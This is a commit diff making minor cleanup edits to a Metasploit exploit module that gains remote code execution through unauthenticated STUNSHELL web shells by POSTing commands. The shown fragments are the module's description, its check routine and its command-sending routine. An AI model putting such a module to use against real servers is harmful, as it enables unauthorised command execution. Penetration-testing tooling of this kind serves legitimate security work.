cleanup for stunshell_exec
parent
a7a5569725
commit
9b18eb858b
|
@ -16,14 +16,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'STUNSHELL Web Shell Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits unauthenticated versions of the "STUNSHELL" web shell. This
|
||||
module works when safe mode is disabled on the web server. This shell is widely
|
||||
used in automated RFI payloads.
|
||||
This module exploits unauthenticated versions of the "STUNSHELL" web shell.
|
||||
This module works when safe mode is disabled on the web server. This shell is
|
||||
widely used in automated RFI payloads.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module
|
||||
'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path.to_s)
|
||||
request_parameters = {
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def http_send_command(cmd)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path.to_s)
|
||||
request_parameters = {
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
|
|
Loading…
Reference in New Issue